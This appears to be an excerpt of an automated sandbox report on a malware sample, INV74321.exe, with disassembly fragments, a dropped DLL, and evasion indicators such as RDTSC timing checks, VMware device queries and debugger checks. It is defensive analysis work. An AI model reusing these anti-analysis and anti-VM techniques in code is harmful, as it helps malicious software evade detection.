          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00418F45 push es; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B2D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_004161E9 push es; retf
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_0041624E push es; retf
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_1_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0379D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030CC381 pushad ; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030CB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030C624E push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030C61E9 push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030C60CD push 00000033h; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030C8F45 push es; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030CB40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030CB402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_030CB46C push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | File created: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll
          Source: C:\Users\user\Desktop\INV74321.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\INV74321.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 00000000030B85E4 second address: 00000000030B85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 00000000030B897E second address: 00000000030B8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5468 | Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6748 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.231378455.0000000004DF3000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.231773140.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.237953316.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.233054387.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.239170353.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.484763017.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.242904889.00000000089C5000.00000004.00000001.sdmp | Binary or memory string: qeMusic
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INV74321.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INV74321.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_023F17F3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_023F15DB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00ADF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
